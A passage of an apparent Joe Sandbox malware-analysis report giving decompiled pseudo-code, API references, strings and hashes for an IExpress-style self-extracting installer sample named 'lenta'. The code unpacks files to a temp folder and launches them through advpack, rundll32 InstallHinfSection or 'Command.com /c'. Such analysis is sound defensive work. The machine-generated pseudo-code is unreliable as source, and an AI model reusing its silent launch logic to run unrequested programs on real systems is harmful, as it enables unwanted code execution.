						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x948c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0094468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E009444B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x949124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00941AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00946CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00943FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x948580;
													if( *0x948580 != 0) {
														E00942267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x948180;
											if( *0x948180 == 0) {
												_t146 = 0x4c7;
												E009444B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x949124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x949a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00946495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E009444B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x949124 = E00946285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E009444B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x948a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x949a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x948a38 & 0x0000ffff;
											_v380 = 0x949154;
											_v376 = _t151;
											_v372 = 0x9491e4;
											_v360 = _t97;
											if( *0x948a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x949a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x948d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x949a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x94a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x949124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x949a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x948a20;
										if( *0x948a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0094202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0094468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x948c42;
									if( *0x948c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x948a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0094468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0094468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00941781( &_v276, 0x104, _t130, 0x948c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0094468F(_t130, 0x949a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x00943baa
0x00943bb0
0x00943bb7
0x00943bc0
0x00943bc2
0x00943bc9
0x00943bcb
0x00943bcf
0x00943bd3
0x00943bd9
0x00943bfd
0x00943bfd
0x00943bff
0x00943c03
0x00943c03
0x00943c11
0x00943c16
0x00943c19
0x00943c28
0x00000000
0x00000000
0x00943c30
0x00943c39
0x00943c40
0x00943d13
0x00943d15
0x00943d21
0x00943d26
0x00000000
0x00943c4f
0x00943c56
0x00943c60
0x00943c65
0x00943c77
0x00943c78
0x00943c7c
0x00943c7e
0x00943c82
0x00943c82
0x00000000
0x00943c7c
0x00943c67
0x00943c69
0x00943c6d
0x00000000
0x00943c58
0x00943c58
0x00943c6e
0x00943c6e
0x00943c87
0x00943c89
0x00943d4d
0x00943d4f
0x00943d50
0x00943d52
0x00943d9e
0x00943da8
0x00943daf
0x00943db4
0x00943db6
0x00943f4d
0x00943f4d
0x00943f4f
0x00943f56
0x00943f57
0x00943f58
0x00943f63
0x00943f63
0x00943dbc
0x00943dc0
0x00943dc2
0x00943de6
0x00943de6
0x00943de8
0x00943f0b
0x00943f0b
0x00943f0f
0x00943f13
0x00943f15
0x00943f1a
0x00943f1c
0x00943f46
0x00943f47
0x00000000
0x00943f47
0x00943f1e
0x00943f1f
0x00943f25
0x00943f26
0x00943f2a
0x00943f2d
0x00943fd9
0x00943fd9
0x00943fda
0x00943fda
0x00943fe1
0x00943fe3
0x00943fe3
0x00943fe8
0x00000000
0x00943fe8
0x00943f33
0x00943f37
0x00000000
0x00943f37
0x00943dee
0x00943dee
0x00943df5
0x00943fad
0x00943fb9
0x00943fc2
0x00943fc8
0x00000000
0x00943fc8
0x00943dfb
0x00943dfd
0x00000000
0x00000000
0x00943e03
0x00943e0a
0x00000000
0x00000000
0x00943e15
0x00943e17
0x00943e19
0x00943f94
0x00943fa4
0x00943f7c
0x00943f80
0x00943f8b
0x00000000
0x00943f8b
0x00943e2c
0x00943e30
0x00943e34
0x00943e36
0x00943f69
0x00943f6e
0x00943f70
0x00943f76
0x00000000
0x00943f76
0x00943e3c
0x00943e43
0x00943e47
0x00943e52
0x00943e56
0x00943e5c
0x00943e61
0x00943e68
0x00943e70
0x00943e74
0x00943e7c
0x00943e80
0x00943e82
0x00943e82
0x00943e87
0x00943e87
0x00943e8b
0x00943e91
0x00943e94
0x00943e96
0x00943e96
0x00943e9b
0x00943e9b
0x00943e9f
0x00943ea2
0x00943ea4
0x00943ea4
0x00943ea9
0x00943ea9
0x00943ead
0x00943eb3
0x00943eb6
0x00943eb8
0x00943eb8
0x00943ebd
0x00943ebd
0x00943ec1
0x00943ec3
0x00943ec5
0x00943ec5
0x00943eca
0x00943eca
0x00943ece
0x00943ed5
0x00943ed9
0x00943ee0
0x00943ee6
0x00943eea
0x00943eec
0x00943eee
0x00943ef3
0x00943ef3
0x00943ef5
0x00943efa
0x00943efb
0x00943efd
0x00943f40
0x00000000
0x00943eff
0x00943eff
0x00943f05
0x00000000
0x00943f05
0x00943efd
0x00943dc7
0x00943dce
0x00000000
0x00000000
0x00943dd0
0x00943dd7
0x00000000
0x00000000
0x00943dd9
0x00943ddb
0x00000000
0x00000000
0x00943ddd
0x00943de1
0x00000000
0x00943de1
0x00943d59
0x00943d65
0x00943d6a
0x00943d6c
0x00000000
0x00000000
0x00943d6e
0x00943d75
0x00000000
0x00000000
0x00943d8f
0x00943d96
0x00943d98
0x00000000
0x00000000
0x00000000
0x00943d98
0x00943c8f
0x00943c98
0x00943cf1
0x00943cf3
0x00000000
0x00000000
0x00943cfe
0x00943d11
0x00000000
0x00000000
0x00000000
0x00943d11
0x00943c9c
0x00943ca5
0x00943ca7
0x00000000
0x00000000
0x00943cad
0x00943cb2
0x00943cb7
0x00943cc5
0x00000000
0x00000000
0x00943ce8
0x00943cec
0x00943ced
0x00943ced
0x00000000
0x00943ce8
0x00943c9e
0x00000000
0x00943c9e
0x00943c56
0x00943d35
0x00943d35
0x00943d3c
0x00943d48
0x00000000
0x00943d48
0x00943c03
0x00943be2
0x00943be7
0x00943bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00943C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00943CDC

Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
Part of subcall function 0094468F: SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
Part of subcall function 0094468F: LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
Part of subcall function 0094468F: LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
Part of subcall function 0094468F: memcpy_s.MSVCRT ref: 009446E5
Part of subcall function 0094468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00948C42), ref: 00943D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00943E26
FreeLibrary.KERNEL32(00000000,?,00948C42), ref: 00943EFF
LocalFree.KERNEL32(?,?,?,?,00948C42), ref: 00943F1F
FreeLibrary.KERNEL32(00000000,?,00948C42), ref: 00943F40
LocalFree.KERNEL32(?,?,?,?,00948C42), ref: 00943F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00948C42), ref: 00943F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00948C42), ref: 00943F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00948C42), ref: 00943FC2

Strings

RUNPROGRAM, xrefs: 00943D05
lenta, xrefs: 00943E68
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00943E74
REBOOT, xrefs: 00943BE2
USRQCMD, xrefs: 00943CAD
advpack.dll, xrefs: 00943F9D
ADMQCMD, xrefs: 00943C9E
D, xrefs: 00943C19
DoInfInstall, xrefs: 00943E1F, 00943E24, 00943F68
SHOWWINDOW, xrefs: 00943C34
POSTRUNPROGRAM, xrefs: 00943D60
<None>, xrefs: 00943CC9, 00943D7D

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
API String ID: 1032054927-384775695
Opcode ID: 48143cdb57b994c5c1651c4194734f2609eb04023c292cf5429943576956a52b
Instruction ID: 2ba67fc15af1ed057ccbea65ce6a79c3e7c7d1614b8012b60a875f536a2c0588
Opcode Fuzzy Hash: 48143cdb57b994c5c1651c4194734f2609eb04023c292cf5429943576956a52b
Instruction Fuzzy Hash: 9DB102749183019BE730DF348845F6B77E8EB96704F108A2DFA95D61E0EB74CA44DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00941AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00941AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x948004; // 0xec518a5e
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00941680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00941A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00941781( &_v268, 0x104, _t111, "C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\");
					E0094658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00941680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E009466C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E009466C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00941680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00941781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E009416B3( &_v1552, 0x400, " ");
										E009416B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00942AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0094171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00941A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00941A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E009444B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x949120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x941140, _t156, 8,  &_v268) == 0) {
										 *0x949a34 =  *0x949a34 & 0xfffffffb;
										if( *0x949a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0094171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x949a34 =  *0x949a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00941680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00941680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00946CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x00941af3
0x00941afa
0x00941b07
0x00941b09
0x00941b1a
0x00941b20
0x00941b2c
0x00941b3b
0x00941b40
0x00941b2e
0x00941b2e
0x00941b33
0x00941b33
0x00941b46
0x00941b4c
0x00941b52
0x00941b57
0x00941b5d
0x00941b61
0x00941b9f
0x00941b9f
0x00941bb1
0x00941bc2
0x00000000
0x00941b63
0x00941b63
0x00941b65
0x00941b68
0x00941b68
0x00941b6a
0x00941b6b
0x00941b6f
0x00941b74
0x00000000
0x00000000
0x00941b76
0x00941b7b
0x00941b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00941b8c
0x00941b8c
0x00941b98
0x00941bc7
0x00941bc9
0x00941bcc
0x00941bd3
0x00941d75
0x00941d76
0x00941d78
0x00941d7f
0x00941e05
0x00941e09
0x00000000
0x00000000
0x00941e12
0x00941e1b
0x00941e73
0x00941e21
0x00941e21
0x00941e28
0x00941e37
0x00941e3e
0x00941e52
0x00941e60
0x00941e60
0x00941e3e
0x00941e79
0x00941e7b
0x00941e84
0x00000000
0x00941d9b
0x00941d9b
0x00941da0
0x00941da2
0x00941da5
0x00941da5
0x00941da7
0x00941da8
0x00941dac
0x00941dae
0x00941db4
0x00941db7
0x00941db7
0x00941db9
0x00941dba
0x00941dbe
0x00941dc3
0x00941dce
0x00941dd2
0x00941deb
0x00000000
0x00941df0
0x00000000
0x00941dd2
0x00941bf7
0x00941bfe
0x00941c07
0x00941d55
0x00941d5a
0x00941d5b
0x00941d5d
0x00941d5e
0x00000000
0x00941c1b
0x00941c1b
0x00941c20
0x00941c2c
0x00941c33
0x00941c38
0x00941c3a
0x00941c3a
0x00941c40
0x00941c4b
0x00941c4b
0x00941c5d
0x00941c61
0x00941dd4
0x00941dd4
0x00941dd6
0x00941ddb
0x00941ddc
0x00941dde
0x00941d64
0x00941d64
0x00941d67
0x00941d6c
0x00000000
0x00941c67
0x00941c67
0x00941c6d
0x00941c72
0x00941c74
0x00941c74
0x00941c8e
0x00941c99
0x00941cc0
0x00941cf8
0x00941d07
0x00941d23
0x00941d09
0x00941d14
0x00941d1b
0x00941d1b
0x00941d2b
0x00941d2d
0x00941d2d
0x00941d38
0x00941d39
0x00941d46
0x00941cc2
0x00941cc2
0x00941ccc
0x00941cce
0x00941cce
0x00941cdb
0x00941ce6
0x00941cee
0x00941cee
0x00941e89
0x00941e91
0x00941e92
0x00941e94
0x00941e97
0x00941ea4
0x00941ea4
0x00941c61
0x00941c07
0x00941bd3
0x00941b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00941BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00941BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00941C57
GetPrivateProfileIntA.KERNEL32 ref: 00941C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00941140,00000000,00000008,?), ref: 00941CB8
GetShortPathNameA.KERNEL32 ref: 00941D1B

Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554

Strings

Reboot, xrefs: 00941C82
DefaultInstall, xrefs: 00941C74, 00941C87, 00941CCE, 00941CD3, 00941D2D, 00941D39
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00941D3B
Command.com /c %s, xrefs: 00941D9B, 00941DE8
.BAT, xrefs: 00941D83
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00941BA0
Version, xrefs: 00941CB3
setupx.dll, xrefs: 00941D14
setupapi.dll, xrefs: 00941D23, 00941D3A
", xrefs: 00941B25
AdvancedINF, xrefs: 00941CAE
.INF, xrefs: 00941BDB

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-21273240
Opcode ID: bd624066a592dda2765cf4babc8b20fef8b979012748b03058e41aad5016a7ae
Instruction ID: 061faf0c1a4d348202ac8f88c5e4f52abf5fbc33f0acb42d0b836aad3a5f1d73
Opcode Fuzzy Hash: bd624066a592dda2765cf4babc8b20fef8b979012748b03058e41aad5016a7ae
Instruction Fuzzy Hash: F5A159B4E482186BEB309B24CC44FEA77ADEF96314F1402A5F595A32C1DBB09EC5CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00942F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00942F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x948004; // 0xec518a5e
				_v8 = _t9 ^ _t46;
				if( *0x948a38 != 0) {
					L5:
					_t11 = E00945164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00946CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E009455A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0094658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x94a288("C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x948a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\engineer\AppData\Local\Temp\IXP001.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x948a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x948d48 & 0x000000c0;
									if(( *0x948d48 & 0x000000c0) == 0) {
										_t41 =  *0x949a40; // 0x3, executed
										_t26 = E0094256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x948a24; // 0x0
									 *0x949a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x948a38;
										if( *0x948a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00944169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x949a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00943BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x948a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00943B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E009444B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x949124 = E00946285();
							goto L16;
						}
						_t59 =  *0x949a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0094621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x948a24;
				if( *0x948a24 != 0) {
					L4:
					_t34 = E00943A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E009451E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x948a38;
				if( *0x948a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x00942f1d
0x00942f28
0x00942f2f
0x00942f3d
0x00942f6c
0x00942f6c
0x00942f71
0x00942f73
0x00943041
0x00943041
0x00943043
0x00943053
0x00943053
0x00942f79
0x00942f80
0x00000000
0x00942f86
0x00942f86
0x00942f93
0x00942f9e
0x00942fa0
0x00942fa6
0x00942fb8
0x00942fba
0x00942fbe
0x00942fc6
0x00942fcc
0x00942fd4
0x00942fd6
0x00942fd8
